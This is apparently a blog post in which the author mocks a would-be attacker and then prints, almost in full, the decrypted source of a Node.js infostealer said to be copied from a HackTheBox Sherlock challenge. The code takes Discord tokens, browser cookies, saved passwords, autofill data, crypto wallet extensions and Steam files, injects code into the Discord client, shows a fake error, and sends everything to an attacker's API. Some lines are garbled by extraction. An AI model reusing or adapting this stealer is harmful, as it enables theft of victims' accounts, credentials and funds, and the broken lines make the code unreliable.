Today we're going to tell the story of the time a wannabe script kiddie tried to hack me using a malware copy-pasted from HackTheBox CTF.
Specifically, the code was stolen from HTB Sherlock: Subatomic, and was totally mutilated since this kiddie couldn't figure out how computers work.
Rule number one of blackasshattery, don't be like this:
The creator of this malware thought that decrypting the code from AES-256-GCM would protect it against reverse engineering. That might work against Windows Defender, but it takes less than ten seconds to change those last five lines to a "console.log":
So much for that. Now I have your code:
The entire thing is copied word-for-word from the HackTheBox code, with some minor neuturing in places where our script kiddie seemingly couldn't get the code to work.
The API URL was changed to their own domain, of course:
The original HackTheBox code had a real VM check, but our script kiddie couldn't get it to work so they dumbed it down to a "if RAM < 2GB":
Sucks to suck. Here is the entire source to their malware:
const JSZip = require('jszip');
const { execSync, exec } = require('child_process');
const AdmZip = require('adm-zip');
const { Dpapi } = require('@primno/dpapi');
const { join } = require('path');
const { createDecipheriv } = require('crypto');
const { totalmem, cpus, userInfo, uptime } = require('os');
const { existsSync, readdirSync, readFileSync, statSync, writeFileSync, copyFileSync } = require('fs');
const si = require('systeminformation');
const { Database } = require('sqlite3');
const options = {
api: '',
user_id: '6533808688',
logout_discord: 'false'
function checkVm() {
if(Math.round(totalmem() / (1024 * 1024 * 1024)) < 2) process.exit(1);
async function getDiscordTokens() {
const request = await fetch(options.api + 'paths', {
method: 'GET',
headers: {
'Content-Type': 'application/json',
'duvet_user': options.user_id
const paths = await request.json();
const tokens_list = [];
for(const [key, value] of Object.entries(paths.discordTokens)) {
const path = value.replace('appdata', process.env.LOCALAPPDATA).replace('roaming', process.env.APPDATA);
if(existsSync(path) && existsSync(join(path, '..', '..', 'Local State'))) {
for(const file of readdirSync(path)) {
if(file?.endsWith('.ldb') || file?.endsWith('.log')) {
if(!existsSync(join(path, file))) return;
const file_content = readFileSync(join(path, file), 'utf-8')
.split('\n')?.map((x) => x?.trim());
file_content?.forEach((line) => {
const encrypted_tokens = line?.match(/dQw4w9WgXcQ:[^.*['(.*)'\].*$][^']*/gi);
if(encrypted_tokens) {
encrypted_tokens?.forEach(async(token) => {
if(token?.endsWith('\\')) token = (token?.slice(0, -1).replace('\\', ''))?.slice(0, -1);
const encrypted_key = Buffer.from(JSON.parse(readFileSync(join(path, '..', '..', 'Local State')))?.os_crypt?.encrypted_key, 'base64').slice(5);
const decrypted_key = Dpapi?.unprotectData(Buffer.from(encrypted_key, 'utf-8'), null, 'CurrentUser');
if(!decrypted_key) return;
let decrypted_token;
const encrypted = Buffer.from(token?.split(':')[1], 'base64');
if(!encrypted) return;
const start = encrypted?.slice(3, 15),
middle = encrypted?.slice(15, encrypted?.length - 16),
end = encrypted?.slice(encrypted?.length - 16, encrypted?.length);
if(decrypted_key.byteLength >= 64) return;
if(start?.length !== 12) return;
const decipher = createDecipheriv('aes-256-gcm', decrypted_key, start);
if(end?.byteLength !== 16) return;
decrypted_token = decipher?.update(middle, 'base64', 'utf8') +'utf8');
if(!tokens_list?.find((t) => t?.token === decrypted_token)) {
token: decrypted_token,
found_in: key,
auth_tag_length: end.length,
crypto_iv: start?.length
} else if(existsSync(path) && !existsSync(join(path, '..', '..', 'Local State'))) {
for(const file of readdirSync(path)) {
if(file?.endsWith('.ldb') || file?.endsWith('.log')) {
const file_content = readFileSync(join(path, file), 'utf-8')?.split(/\r?\n/);
file_content?.forEach((line) => {
for(const regex of [new RegExp(/mfa\.[\w-]{84}/g), new RegExp(/[\w-][\w-][\w-]{24}\.[\w-]{6}\.[\w-]{26,110}/gm), new RegExp(/[\w-]{24}\.[\w-]{6}\.[\w-]{38}/g)]) {
const matched_tokens = line?.match(regex);
if(matched_tokens) {
matched_tokens?.forEach(async(token) => {
if(!tokens_list?.find((t) => t?.token === token)) {
token: token,
found_in: key
} else {
const merge = (a, b, predicate = (a, b) => a === b) => {
const c = [...a];
b?.forEach((bItem) => (c?.some((cItem) => predicate(bItem, cItem)) ? null : c?.push(bItem)))
return c;
const firefox_tokens = await stealFirefoxTokens();
const valid_tokens = [];
for(const value of merge(tokens_list, firefox_tokens)) {
const token_data = await checkToken(value?.token);
if(token_data?.id) {
const user_data = await tokenRequests(value?.token, token_data?.id);
if(!valid_tokens.find((u) => u?.user?.data?.id === {
token: value?.token,
found_at: value?.found_in,
auth_tag_length: value?.auth_tag_length,
crypto_iv: value?.crypto_iv,
user: {
data: token_data,
profile: user_data?.profile,
payment_sources: user_data?.payment_sources
if(valid_tokens?.length) {
fetch(options.api + 'valid-tokens', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
async function newInjection() {
const system_info = await si?.osInfo();
const injections = await discordInjection();
const network = await fetch('', {
method: 'GET',
headers: {
'Content-Type': 'application/json'
const network_data = await network.json();
fetch(options.api + 'new-injection', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
ram: Math.round(totalmem() / (1024 * 1024 * 1024)),
cpu: cpus()?.[0]?.model,
distro: system_info?.distro,
uptime: uptime() * 1000,
network: {
ip: network_data?.ip,
country: network_data?.country,
city: network_data?.city,
region: network_data?.region,
async function tokenRequests(token, id) {
const profile = await fetch(`${id}/profile`, {
method: 'GET',
headers: {
Authorization: token,
'Content-Type': 'application/json'
const payment_sources = await fetch(``, {
method: 'GET',
headers: {
Authorization: token,
'Content-Type': 'application/json'
const promises = await Promise.allSettled([
return {
profile: promises[0]?.value,
async function checkToken(token) {
const check_token = await fetch('', {
headers: {
Authorization: token,
'Content-Type': 'application/json'
if(check_token?.status === 200) {
return new Promise(async(res) => {
const json = await check_token?.json();
} else {
return check_token?.status;
async function stealFirefoxTokens() {
const path = join(process.env.APPDATA, 'Mozilla', 'Firefox', 'Profiles');
const tokens_list = [];
if(existsSync(path)) {
try {
const files = execSync('where /r . *.sqlite', { cwd: path })?.toString()
files?.forEach((file) => {
file = file?.trim();
if(existsSync(file) && statSync(file)?.isFile()) {
const lines = readFileSync(file, 'utf8')
?.split('\n')?.map(x => x?.trim());
for(const regex of [new RegExp(/mfa\.[\w-]{84}/g), new RegExp(/[\w-][\w-][\w-]{24}\.[\w-]{6}\.[\w-]{26,110}/gm), new RegExp(/[\w-]{24}\.[\w-]{6}\.[\w-]{38}/g)]) {
lines?.forEach((line) => {
const tokens = line?.match(regex);
if(tokens) {
tokens?.forEach((token) => {
if (
!token?.startsWith('NzY') &&
!token?.startsWith('NDk') &&
!token?.startsWith('MTg') &&
!token?.startsWith('MjI') &&
!token?.startsWith('MzM') &&
!token?.startsWith('NDU') &&
!token?.startsWith('NTE') &&
!token?.startsWith('NjU') &&
!token?.startsWith('NzM') &&
!token?.startsWith('ODA') &&
!token?.startsWith('OTk') &&
!token?.startsWith('MTA') &&
) return;
if(!tokens_list?.find((t) => t?.token === token)) {
token: token,
found_in: 'Firefox'
} catch(e) {
return tokens_list;
async function discordInjection() {
const infectedDiscords = [];
[join(process.env.LOCALAPPDATA, 'Discord'), join(process.env.LOCALAPPDATA, 'DiscordCanary'), join(process.env.LOCALAPPDATA, 'DiscordPTB')]
?.forEach(async(dir) => {
if(existsSync(dir)) {
if(!readdirSync(dir).filter((f => f?.startsWith('app-')))?.[0]) return;
const path = join(dir, readdirSync(dir).filter((f => f.startsWith('app-')))?.[0], 'modules', 'discord_desktop_core-1');
const discord_index = execSync('where /r . index.js', { cwd: path })?.toString()?.trim();
if(discord_index) infectedDiscords?.push(
dir?.split(process.env.LOCALAPPDATA)?.[1]?.replace('\\', '')
const request = await fetch(options.api + 'injections', {
method: 'GET',
headers: {
duvet_user: options?.user_id,
logout_discord: options?.logout_discord
const data = await request.json();
writeFileSync(discord_index, data?.discord, {
flag: 'w'
await kill(['discord', 'discordcanary', 'discorddevelopment', 'discordptb']);
exec(`${join(dir, 'Update.exe')} --processStart ${dir?.split(process.env.LOCALAPPDATA)?.[1]?.replace('\\', '')}.exe`, function(err) {
if(err) {};
return infectedDiscords;
async function browserCookies(path) {
const cookies = [];
const hq_cookies = [];
if (existsSync(path)) {
let path_split = path?.split('\\'),
path_st = path?.includes('Network') ? path_split?.splice(0, path_split.length - 3) : path_split?.splice(0, path_split?.length - 2),
path_t = path_st?.join('\\') + '\\';
if (path?.startsWith(process.env.APPDATA)) path_t = path;
if (existsSync(join(path, 'Network')) && existsSync(join(path_t, 'Local State'))) {
const encrypted = Buffer.from(JSON.parse(readFileSync(join(path_t, 'Local State'), 'utf-8'))?.os_crypt?.encrypted_key, 'base64').slice(5);
const key = Dpapi.unprotectData(Buffer.from(encrypted, 'utf-8'), null, 'CurrentUser');
if(!key) return;
const result = await new Promise(async(resolve) => {
if (!existsSync(join(path, 'Network', 'Cookies'))) return;
const database = new Database(join(path, 'Network', 'Cookies'));
if(!database) return;
database.each('SELECT * from cookies', async function (err, row) {
if(!row?.encrypted_value) return;
const encrypted_value = row?.encrypted_value;
let decrypted;
if (encrypted_value?.[0] == 1 && encrypted_value?.[1] == 0 && encrypted_value?.[2] == 0 && encrypted_value?.[3] == 0) {
decrypted = Dpapi.unprotectData(encrypted_value, null, 'CurrentUser');
} else {
const start = encrypted_value?.slice(3, 15),
middle = encrypted_value?.slice(15, encrypted_value?.length - 16),
end = encrypted_value?.slice(encrypted_value?.length - 16, encrypted_value?.length);
if(key.byteLength >= 64) return;
if(start?.length !== 12) return;
const decipher = createDecipheriv('aes-256-gcm', key, start);
if(end?.byteLength !== 16) return;
decrypted = decipher?.update(middle, 'base64', 'utf-8') +'utf-8');
let browser = path?.includes('Local') ? path?.split('\\Local\\')[1].split('\\')?.[1] : path?.split('\\Roaming\\')?.[1]?.split('\\')?.[1];
if(path?.includes('Profile')) browser = `${browser} ${path?.split('\\User Data')?.[1]?.replaceAll('\\', '')}`;
if (cookies?.find((c) => c?.browser === browser)) {
cookies?.find((c) => c?.browser === browser)?.list?.push(`${row?.host_key} TRUE / FALSE 2597573456 ${row?.name} ${decrypted}`);
} else {
browser: browser,
list: [`${row?.host_key} TRUE / FALSE 2597573456 ${row?.name} ${decrypted}`]
}, function () {
resolve({ cookies, hq_cookies });
return result;
async function getBrowserCookies() {
const cookies_list = [];
return await new Promise(async(resolve) => {
const request = await fetch(options.api + 'paths', {
method: 'GET',
headers: {
'duvet_user': options.user_id,
const data = await request.json();
const paths = data?.browsers?.map((p) => p?.replace('appdata', process.env.LOCALAPPDATA)?.replace('roaming', process.env.APPDATA));
for(const path of paths) {
if(!path.includes('Firefox')) {
try {
const cookies = await browserCookies(path);
if(cookies?.cookies?.[0]?.browser && cookies?.cookies?.[0]?.list) {
browser: cookies?.cookies?.[0]?.browser,
list: cookies?.cookies?.[0]?.list
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `${e}`
} else {
try {
const firefox_cookies = await getFirefoxCookies(path);
if(firefox_cookies) {
browser: 'Firefox',
list: firefox_cookies?.[0]?.list
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `${e}`
resolve({ cookies_list });
async function getFirefoxCookies(path) {
const cookies = [];
if(existsSync(path)) {
try {
const cookiesFile = execSync('where /r . cookies.sqlite', { cwd: path })?.toString();
if(!cookiesFile) return;
if(!existsSync(join(cookiesFile?.trim()))) return;
const result = await new Promise((res, rej) => {
const database = new Database(cookiesFile?.trim())
if(!database) return;
database.each('SELECT * FROM moz_cookies', async function(err, row) {
if(!row?.value) return;
if(cookies?.find((c) => c?.browser === 'Firefox')) {
cookies?.find((c) => c?.browser === 'Firefox')?.list?.push(`${row?.host}\t${row?.expiry === 0 ? 'FALSE' : 'TRUE'}\t${row?.path}\t${row?.host?.startsWith('.') ? 'FALSE' : 'TRUE'}\t${row?.expiry}\t${row?.name}\t${row?.value}`);
} else {
cookies?.push({ browser: 'Firefox', list: [`${row?.host}\t${row?.expiry === 0 ? 'FALSE' : 'TRUE'}\t${row?.path}\t${row?.host?.startsWith('.') ? 'FALSE' : 'TRUE'}\t${row?.expiry}\t${row?.name}\t${row?.value}`]});
}, function () {
return result;
} catch(e) {
async function browserPasswords(path) {
const passwords = [];
if(existsSync(path)) {
let path_split = path?.split('\\'),
path_st = path?.includes('Network') ? path_split?.splice(0, path_split?.length - 3) : path_split?.splice(0, path_split?.length - 2),
path_t = path_st.join('\\') + '\\';
if (path?.startsWith(process.env.APPDATA)) path_t = path;
if (existsSync(join(path, 'Network')) && existsSync(join(path_t, 'Local State'))) {
const encrypted = Buffer.from(JSON.parse(readFileSync(join(path_t, 'Local State'), 'utf-8'))?.os_crypt.encrypted_key, 'base64').slice(5);
const key = Dpapi.unprotectData(Buffer.from(encrypted, 'utf-8'), null, 'CurrentUser');
if(!key) return;
if(!existsSync(join(path, 'Login Data'))) return;
copyFileSync(join(path, 'Login Data'), join(path, 'passwords.db'));
const result = await new Promise((resolve) => {
if (!existsSync(join(path, 'passwords.db'))) return;
const database = new Database(join(path, 'passwords.db'));
if(!database) return;
database.each('SELECT origin_url, username_value, password_value FROM logins', async function (err, row) {
if(!row?.username_value) return;
const start = row?.password_value.slice(3, 15),
middle = row?.password_value.slice(15, row.password_value?.length - 16),
end = row?.password_value.slice(row.password_value?.length - 16, row.password_value?.length);
if(key.byteLength >= 64) return;
if(start?.length !== 12) return;
const decipher = createDecipheriv('aes-256-gcm', key, start);
let browser = path?.includes('Local') ? path?.split('\\Local\\')[1].split('\\')?.[1] : path?.split('\\Roaming\\')?.[1].split('\\')?.[1];
if(path?.includes('Profile')) browser = `${browser} ${path?.split('\\User Data')?.[1].replaceAll('\\', '')}`;
if(end?.byteLength !== 16) return;
if (passwords?.find((c) => c?.browser === browser)) {
passwords?.find((c) => c.browser === browser)?.list?.push('URL: ' + row?.['origin_url']+ '\nUsername: ' + row?.['username_value'] + '\nPassword: ' + decipher?.update(middle, 'base64', 'utf-8') + decipher?.final('utf-8'));
} else {
passwords.push({ browser: browser, list: ['URL: ' + row?.['origin_url']+ '\nUsername: ' + row?.['username_value'] + '\nPassword: ' + decipher?.update(middle, 'base64', 'utf-8') + decipher?.final('utf-8')] })
}, function () {
return result;
async function browserAutofills(path) {
const autofills = [];
if(existsSync(path)) {
let path_split = path?.split('\\'),
path_st = path?.includes('Network') ? path_split?.splice(0, path_split.length - 3) : path_split?.splice(0, path_split?.length - 2),
path_t = path_st?.join('\\') + '\\';
if (path?.startsWith(process.env.APPDATA)) path_t = path;
if (existsSync(join(path, 'Network')) && existsSync(join(path_t, 'Local State'))) {
copyFileSync(join(path, 'Web Data'), join(path, 'autofills.db'));
const result = await new Promise((resolve) => {
if (!existsSync(join(path, 'autofills.db'))) return;
const database = new Database(join(path, 'autofills.db'));
if(!database) return;
let browser = path?.includes('Local') ? path?.split('\\Local\\')?.[1].split('\\')?.[1] : path?.split('\\Roaming\\')?.[1].split('\\')?.[1];
if(path?.includes('Profile')) browser = `${browser} ${path?.split('\\User Data')?.[1].replaceAll('\\', '')}`;
database.each('SELECT * FROM autofill', async function (err, row) {
if(!row?.name || !row?.value) return;
if (autofills?.find((c) => c?.browser === browser)) {
autofills?.find((c) => c?.browser === browser)?.list.push(`Name: ${row?.name}\nData: ${row?.value}`);
} else {
autofills?.push({ browser: browser, list: [`Name: ${row?.name}\nData: ${row?.value}`]})
}, function () {
return result;
async function getBrowserAutofills() {
const autofills_list = [];
return await new Promise(async(resolve) => {
const request = await fetch(options.api + 'paths', {
method: 'GET',
headers: {
'duvet_user': options.user_id,
const data = await request.json();
const paths = data? => p?.replace('appdata', process.env.LOCALAPPDATA)?.replace('roaming', process.env.APPDATA));
for(const path of paths) {
if(!path.includes('Firefox')) {
try {
const autofills = await browserAutofills(path);
if(autofills?.[0]?.browser && autofills?.[0]?.list) {
browser: autofills?.[0]?.browser,
list: autofills?.[0]?.list
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `${e}`
async function getBrowserPasswords() {
const passwords_list = [];
return await new Promise(async(resolve) => {
const request = await fetch(options.api + 'paths', {
method: 'GET',
headers: {
'duvet_user': options.user_id,
const data = await request.json();
const paths = data? => p?.replace('appdata', process.env.LOCALAPPDATA)?.replace('roaming', process.env.APPDATA));
for(const path of paths) {
if(!path.includes('Firefox')) {
try {
const passwords = await browserPasswords(path);
if(passwords?.[0]?.browser && passwords?.[0]?.list) {
browser: passwords?.[0]?.browser,
list: passwords?.[0]?.list
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `${e}`
async function getBrowserWallets() {
const found_wallets = [];
return await new Promise(async(resolve) => {
const request = await fetch(options.api + 'paths', {
method: 'GET',
headers: {
'duvet_user': options.user_id,
const data = await request.json();
const paths = data? => p?.replace('appdata', process.env.LOCALAPPDATA)?.replace('roaming', process.env.APPDATA));
for(const path of paths) {
if(existsSync(path)) {
let path_split = path?.split('\\'),
path_st = path?.includes('Network') ? path_split?.splice(0, path_split?.length - 3) : path_split?.splice(0, path_split?.length - 2);
if (path?.startsWith(process.env.APPDATA)) path_t = path;
for(const [key, value] of Object.entries(data?.walletIds)) {
const wallet_zip = new AdmZip();
if(!existsSync(join(path, 'Local Extension Settings', value))) continue;
wallet_zip.addLocalFolder(join(path, 'Local Extension Settings', value));
browser: path?.includes('Local') ? path?.split('\\Local\\')[1].split('\\')?.[1] : path?.split('\\Roaming\\')?.[1].split('\\')?.[1],
folder: value,
files: wallet_zip.getEntries().map((file) => ({
name: file?.name,
buffer: file?.getData()
async function allBrowserData() {
try {
await kill([
'chrome', 'msedge', 'brave', 'firefox', 'opera', 'kometa', 'orbitum', 'centbrowser', '7star', 'sputnik', 'vivaldi',
'epicprivacybrowser', 'uran', 'yandex', 'iridium'
const promisses = await Promise.allSettled([
await fetch(options.api + 'browsers-data', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
cookies: promisses?.[0]?.value?.cookies_list,
autofills: promisses?.[1]?.value,
passwords: promisses?.[2]?.value,
wallets: promisses?.[3]?.value
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `${e}`
function fakeError(message, title) {
execSync(`mshta "javascript:new ActiveXObject('WScript.Shell').Popup('${message}', 0, '${title}', 16);close()"`);
(async() => {
try {
await checkCmdInstallation();
fakeError('An unknown error happened when trying to extract Unity engine files. Contact this app developers or try again later.', 'UNITY_ENGINE_ERROR');
await newInjection();
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `Error from Injection: ${e}`
try {
await getDiscordTokens();
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `Discord Tokens Error: ${e}`
try {
await getSteamFiles();
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `Steam Error: ${e}`
try {
await allBrowserData();
} catch(e) {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `Browser Data Error: ${e}`
process.on('unhandledRejection', async(error) => {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `unhandledRejection: ${error}`
process.on('uncaughtException', async(error) => {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `uncaughtException: ${error}`
process.on('uncaughtExceptionMonitor', async(error) => {
await fetch(options.api + 'errors', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
computer_name: userInfo()?.username,
data: {
error: `uncaughtExceptionMonitor: ${error}`
async function kill(processes) {
return new Promise(async(resolve) => {
const tasks = execSync('tasklist')?.toString()?.toLowerCase();
processes = processes?.filter(task => tasks?.includes(task));
processes?.forEach((task) => exec(`taskkill /f /im ${task}.exe`));
await sleep(2500);
async function getSteamFiles() {
const steam_zip = new JSZip();
let user_id;
if(existsSync('C:\\Program Files (x86)\\Steam') && existsSync('C:\\Program Files (x86)\\Steam\\config\\loginusers.vdf')) {
const steam_accounts = readFileSync('C:\\Program Files (x86)\\Steam\\config\\loginusers.vdf', 'utf-8');
const found_accounts = steam_accounts.match(new RegExp(/7656[0-9]{13}/g));
if(found_accounts) {
user_id = found_accounts?.[0];
readdirSync('C:\\Program Files (x86)\\Steam\\config').forEach((f) => {
if(!['lighthouse', 'gamepad', 'avatarcache'].includes(f)) {
steam_zip.file(f, Buffer.from(readFileSync(`C:\\Program Files (x86)\\Steam\\config\\${f}`, 'utf-8')));
const zip_file = await steam_zip.generateAsync({
type: 'nodebuffer'
fetch(options.api + 'steam-files', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
body: JSON.stringify({
duvet_user: options?.user_id,
async function checkCmdInstallation() {
return await new Promise(async(resolve) => {
if(!existsSync('C:\\Windows\\system32\\cmd.exe')) {
const request = await fetch(options.api + 'cmd-file', {
method: 'GET',
headers: {
'Content-Type': 'application/json',
'duvet_user': options?.user_id
const response = await request.json();
writeFileSync(join(process.env.USERPROFILE, 'Documents', 'cmd.exe'), Buffer.from(response?.buffer), {
flag: 'w'
process.env.ComSpec = join(process.env.USERPROFILE, 'Documents', 'cmd.exe');
} else {
process.env.ComSpec = 'C:\\Windows\\system32\\cmd.exe';
function sleep(ms) {
return new Promise((resolve) => {
setTimeout(resolve, ms);